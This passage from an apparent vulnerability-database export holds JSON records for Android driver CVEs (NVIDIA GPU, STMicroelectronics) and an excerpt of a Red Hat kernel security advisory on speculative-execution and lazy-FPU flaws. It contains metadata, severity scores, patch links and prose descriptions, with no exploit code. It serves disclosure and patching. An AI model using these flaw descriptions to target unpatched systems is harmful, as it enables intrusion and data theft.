        "id": "CNVD-2017-01589"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01589"
      }
    ]
  },
  "last_update_date": "2023-12-18T11:43:52.953000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin-February 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for GoogleNexus NVIDIA GPUDriver Privilege Escalation Vulnerability (CNVD-2017-01589)",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/89445"
      },
      {
        "title": "Android NVIDIA GPU Fixes for driver permission and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=67589"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014February 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=861656f01e3e18209f39ad844e9ee35d"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01589"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0428"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001502"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-305"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-416",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001502"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0428"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/96070"
      },
      {
        "trust": 2.1,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1037798"
      },
      {
        "trust": 1.7,
        "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4561"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-0428"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-0428"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/416.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01589"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0428"
      },
      {
        "db": "BID",
        "id": "96070"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001502"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0428"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-305"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01589"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0428"
      },
      {
        "db": "BID",
        "id": "96070"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001502"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0428"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-305"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01589"
      },
      {
        "date": "2017-02-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0428"
      },
      {
        "date": "2017-02-06T00:00:00",
        "db": "BID",
        "id": "96070"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001502"
      },
      {
        "date": "2017-02-08T15:59:01.347000",
        "db": "NVD",
        "id": "CVE-2017-0428"
      },
      {
        "date": "2017-02-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-305"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01589"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0428"
      },
      {
        "date": "2017-03-07T04:01:00",
        "db": "BID",
        "id": "96070"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001502"
      },
      {
        "date": "2019-10-03T00:03:26.223000",
        "db": "NVD",
        "id": "CVE-2017-0428"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-305"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-305"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "NVIDIA GPU Vulnerability that could elevate privileges in drivers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001502"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-305"
      }
    ],
    "trust": 0.6
  }
}

var-201701-0145
Vulnerability from variot

An information disclosure vulnerability in the STMicroelectronics driver could enable a local malicious application to access data outside of its permission levels. This issue is rated as Moderate because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10. Android ID: A-31799972. STMicroelectronics The driver contains a vulnerability in which information is disclosed. GoogleNexus is a smart device from Google. Attackers can exploit vulnerabilities to obtain potentially sensitive information. Information obtained may aid in further attacks

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201701-0145",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "nexus 6p",
        "scope": null,
        "trust": 0.9,
        "vendor": "google",
        "version": null
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "5x"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00236"
      },
      {
        "db": "BID",
        "id": "95233"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006786"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8474"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-056"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8474"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Peter Pi (@heisecode) of Trend Micro.",
    "sources": [
      {
        "db": "BID",
        "id": "95233"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-056"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2016-8474",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 4.9,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 2.6,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2016-8474",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2017-00236",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.7,
            "baseSeverity": "Medium",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2016-8474",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-8474",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-00236",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201701-056",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-8474",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00236"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8474"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006786"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8474"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-056"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An information disclosure vulnerability in the STMicroelectronics driver could enable a local malicious application to access data outside of its permission levels. This issue is rated as Moderate because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10. Android ID: A-31799972. STMicroelectronics The driver contains a vulnerability in which information is disclosed. GoogleNexus is a smart device from Google. Attackers can exploit vulnerabilities to obtain potentially sensitive information. Information obtained may aid in further attacks",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8474"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006786"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-00236"
      },
      {
        "db": "BID",
        "id": "95233"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8474"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-8474",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "95233",
        "trust": 2.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006786",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-00236",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-056",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8474",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00236"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8474"
      },
      {
        "db": "BID",
        "id": "95233"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006786"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8474"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-056"
      }
    ]
  },
  "id": "VAR-201701-0145",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00236"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00236"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:05:08.414000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin - January 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for GoogleNexus\u0027STMicroelectronics\u0027Driver Information Disclosure Vulnerability (CNVD-2017-00236)",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/87737"
      },
      {
        "title": "Google Nexus 5X  and Nexus 6P Android STMicroelectronics Fixes for driver information disclosure vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=66800"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014January 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=e8654f311f23268a7da69416ca7535a2"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00236"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8474"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006786"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-056"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006786"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8474"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/95233"
      },
      {
        "trust": 1.8,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-8474"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-8474"
      },
      {
        "trust": 0.3,
        "url": "http://www.android.com/"
      },
      {
        "trust": 0.3,
        "url": "https://developers.google.com/android/nexus/images"
      },
      {
        "trust": 0.3,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html "
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/200.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00236"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8474"
      },
      {
        "db": "BID",
        "id": "95233"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006786"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8474"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-056"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00236"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8474"
      },
      {
        "db": "BID",
        "id": "95233"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006786"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8474"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-056"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-10T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-00236"
      },
      {
        "date": "2017-01-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8474"
      },
      {
        "date": "2017-01-03T00:00:00",
        "db": "BID",
        "id": "95233"
      },
      {
        "date": "2017-01-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-006786"
      },
      {
        "date": "2017-01-12T20:59:01.907000",
        "db": "NVD",
        "id": "CVE-2016-8474"
      },
      {
        "date": "2017-01-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-056"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-10T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-00236"
      },
      {
        "date": "2017-01-18T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8474"
      },
      {
        "date": "2017-01-12T01:09:00",
        "db": "BID",
        "id": "95233"
      },
      {
        "date": "2017-01-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-006786"
      },
      {
        "date": "2017-01-18T02:59:16.580000",
        "db": "NVD",
        "id": "CVE-2016-8474"
      },
      {
        "date": "2017-01-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-056"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-056"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "STMicroelectronics Vulnerability in information disclosure in drivers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006786"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-056"
      }
    ],
    "trust": 0.6
  }
}

var-201806-1505
Vulnerability from variot

System software utilizing Lazy FP state restore technique on systems using Intel Core-based microprocessors may potentially allow a local process to infer data from another process through a speculative execution side channel. Intel Core Systems with microprocessors contain information disclosure vulnerabilities.Information may be obtained. An attacker could exploit this vulnerability to obtain values about other processes stored in a number register. Attackers can exploit this issue to obtain sensitive information that may aid in further attacks. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Bug Fix(es):

  • update the MRG 2.5.z 3.10 kernel-rt sources (BZ#1692711)

  • -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2018:2164-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2018:2164 Issue date: 2018-07-10 CVE Names: CVE-2018-3639 CVE-2018-3665 CVE-2018-10675 CVE-2018-10872 ==================================================================== 1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 6.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64

  1. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

  • An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639, x86 AMD)

  • kernel: Use-after-free vulnerability in mm/mempolicy.c:do_get_mempolicy function allows local denial of service or other unspecified impact (CVE-2018-10675)

  • Kernel: FPU state information leakage via lazy FPU restore (CVE-2018-3665)

  • kernel: error in exception handling leads to DoS (CVE-2018-8897 regression) (CVE-2018-10872)

For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.

Red Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting CVE-2018-3639 and Julian Stecklina (Amazon.de), Thomas Prescher (cyberus-technology.de), and Zdenek Sojka (sysgo.com) for reporting CVE-2018-3665.

Bug Fix(es):

  • Previously, microcode updates on 32 and 64-bit AMD and Intel architectures were not synchronized. As a consequence, it was not possible to apply the microcode updates. This fix adds the synchronization to the microcode updates so that processors of the stated architectures receive updates at the same time. As a result, microcode updates are now synchronized. (BZ#1574592)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1566890 - CVE-2018-3639 hw: cpu: speculative store bypass 1575065 - CVE-2018-10675 kernel: Use-after-free vulnerability in mm/mempolicy.c:do_get_mempolicy function allows local denial-of-service or other unspecified impact 1585011 - CVE-2018-3665 Kernel: FPU state information leakage via lazy FPU restore 1596094 - CVE-2018-10872 kernel: error in exception handling leads to DoS (CVE-2018-8897 regression)

  1. Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: kernel-2.6.32-754.2.1.el6.src.rpm

